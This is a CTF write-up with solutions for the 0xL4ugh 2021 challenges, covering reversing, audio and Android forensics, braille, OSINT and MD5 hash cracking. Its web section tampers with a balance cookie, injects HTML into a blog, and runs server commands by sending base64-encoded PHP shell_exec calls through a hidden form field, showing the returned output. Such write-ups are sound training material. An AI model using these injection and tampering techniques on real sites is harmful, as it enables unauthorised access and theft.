0xL4ugh CTF 2021 Write-up

Introduction

First CTF created by the 0xL4ugh team.

---

Home – Reverse Engineering

Description

Soo Easy

Solution

For this we just have to open the attached file in Ghidra and check the strings.

Flag: 0xL4ugh{34SY_R3V_Ch411}

---

WannaCry – Reverse Engineering

Description

html

Solution

Lets open the attached file in Ghidra and take a look at the strings.

Here we can find the string 0xL4ugh{Ourfirsteventenjoy} and decoding this as HTML twice we get the flag.

Flag: 0xL4ugh{Ourfirsteventenjoy}

---

1990 – Misc

Description

I got this Massege from The past But i couldn’t understand it can you?!

Solution

For this challenge we get an audio file. When listening to it we can hear some tones that sound like DTMF tones. Lets try to decode the tones to their corresponding values using dtmf-decoder.

python dtmf.py 1990.wav
66#666#8#33#888#33#777#999#8#44#444#66#4#666#66#7777#2#6#33#9#2#999#

Now we can decode the message using the following image as reference.

After decoding we get the message NOTEVERYTHINGONSAMEWAY.

Flag: 0xL4ugh{NOTEVERYTHINGONSAMEWAY}

---

Gesture – Misc

Description

I lost my lock screen password can u get it?

Solution

Here we have a gesture.key file, which is a Android gesture file. We should be able to recover the sequence using DecodeAndroidGesture.

java -jar DecodeAndroidGesture.jar gesture.key
[+] Searching...
[+] Sequence: 75214863

Flag: 0xL4ugh{75214863}

---

Noisy – Misc

Description

s0 noisy.

Solution

Attached is a audio file and when we listen to it it’s just noise. Lets take a look at the spectrogram view of the audio.

Flag: 0xL4ugh{Sp3c7r0_1s_Gr347}

---

Cakes Shop – Web

Description

Welcome To My Cakes Shop Can you Buy The Flag Cake To Me ? 🙂

Solution

Here we got a web-shop for cakes and our goal is to buy the Flag Cake, but our current balance is below the price of the cake.

Taking a look at the cookies we find a cookie called UserInfo with the value GMYDAMBQGA%3D%3D%3D%3D%3D%3D. The value turns out to be Base32, so if we add a bunch of zeroes and to the original value and then update the cookie we are able to buy the Flag Cake.

Flag: 0xL4ugh{baSe_32_Cook!es_ArE_FuNny}

---

EasyLogin – Web

Description

The Exploitation Is Easy But The Development Is Hard !!

Solution

When navigating to the challenge page we see a login page for a blog.

If we take a look at the source for the page, we can find the following comment.

<!-- To Post Blogs You Should Login With The Default Credentials-->
<!-- 
user = admin
pass = admin
-->

Logging in with the credentials found in the page source we have access to the blog posting functionality.

When we post a new blog post we are redirected to a new page with the blog contents.

Taking a look at the source for this page we can find a comment.

<!--
Hint: Inject An HTML Tag And Give Him The ID flagHunt
-->

Ok, so lets see what the rendered html looks like for the blog post.

<b style='color: white'>Blog Title:  <i style='color: yellow'>1</i></b>
<br><br>
<b style='color: white;'>Author:  <i style='color: red;'>1</i></b>
<br><br>
<b style='color: white;'>Email:  <i stye='color: white'><ins>tet@tetete.com</ins></i></b>
<br><br>
<b style='color: white'>Blog:  <pre><i style='color: orange' id='main'><center><h2>fsdfds</i></b></h2></center></pre><br><br><hr>

So we got some inputs that we may be able to inject some HTML tags to. Lets try the blog post field first.

When posting this we get a alert dialog.

Awesome. The console output we got is the following.

After we get the Connected 100% message we get a confirmation dialog asking us if we want to continue. Clicking yes adds the following to the console.

Flag: 0xL4ugh{N0_Syst3m_1s_S@f3_3v3n_Y0u}

---

Sad_Agent – Web

Description

do you know … i have secret organization called sad can’t anyone access it by any browser and you should be sad to access and decode anything in your bad life

Solution

When we first access the challenge page, all we have is a button called chek. When we press the button we get the following message.

If we change the user-agent to sad and click the button we get the following.

Ok, nothing really interesting. If we take a look at the source of the page we find a hidden input field that is sent when clicking the button.

<form action="" method="post">
  <input type="hidden" name="url" value="ZWNobyAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107">
  <input type="submit" name="submit" value="chek">
</form>

If we base64 decode this we find out that it is PHP code that’s used by the server.

echo $_SERVER['HTTP_USER_AGENT'];

Lets try use this to list the files in the current directory. If we base64 encode echo shell_exec('ls -al'); and change the value of the hidden input field we get the directory listing.

<font color="green">total 20
drwxr-xr-x 2 ghazy ghazy 4096 Jan 15 16:08 .
drwxr-xr-x 3 root  root  4096 Jan 15 15:45 ..
-rw-r--r-- 1 ghazy ghazy 1059 Jan 15 15:59 index.php
-rw------- 1 root  root     5 Jan 15 16:08 index.php.save
-rw------- 1 ghazy ghazy    1 Jan 15 16:08 nano.save
</font>

Great. Lets try to get the contents of index.php. So lets change the value of the input field to the base64 encoded value of echo shell_exec('cat index.php'); and send the request. Now we got the contents of index.php. In the first couple of lines of the file we can find the flag as a comment.

<?php
	if (isset($_POST['submit'])) {
		if ($_SERVER['HTTP_USER_AGENT'] === 'sad') {
			echo "<center><br>Hi mr sad Do you know i'm lonly<br></center>";
		} else {
			echo "<center><br><h4>You are not member in sad world you should be sad</h4></center>";
		}
	}

	//$flag = "0xL4ugh{S@dC0d3r_M3mbe3r_1n_0xL4ugh_&_sad_W0rld}"
?>

Flag: 0xL4ugh{S@dC0d3r_M3mbe3r_1n_0xL4ugh_&_sad_W0rld}

---

Cyclops – Crypto

Description

Cyclops sent this messege can u read it ??

Solution

Attached to this challenge is an image containing braille characters.

When decoding this using the braille alphabet we get the flag.

Flag: 0xL4ugh{I_Th1nk_Br1ll3_W45_$m4rt}

---

Message From Boss – OSINT

Description

My Boss Told Me That He will send me a message by an account that follow this twitter user (0xL4ugh) but i can’t Find It can you give it to me

Solution

Taking a look at the followers of the account 0xL4ugh we find a bunch of possible accounts that can be the one that sent the message. Taking a look at the profile of the potential accounts we find the following account.

Clicking the Pastebin link gets us a locked paste.

Lets check the Wayback Machine to see if an unlocked version is archived there. When we enter the pastebin link we can see that it has been archived once. Lets check the archived version.

Great, we got the flag!

Flag: 0xL4ugh{S1MPl3_OsINt_Chall3nge}

---

Hashem – Programming

Description

Hashem has a salted hash of his password that he has forgotten. Lucky for us that he is sure that his password had only lower case characters and its was shorter than 6 characters. Can you help him find his password?

the Salt is: “mmal7”

here is the salted Hash: “bd737ce0d884c0dd54adf35fdb794b60”

P.S: there are two possible locations for the salt either before the password or after the password. If the salt was before the password, then the flag would be 0xL4ugh{1_password} and if the salt was after the password then the flag would be 0xL4ugh{2_password}

Solution

Running hashcat with md5($salt, $pass) and md5($pass, $salt) we can brute force the hash. When using md5($salt, $pass) we get the cracked hash.

bd737ce0d884c0dd54adf35fdb794b60:mmal7:laugh

Flag: 0xL4ugh{1_laugh}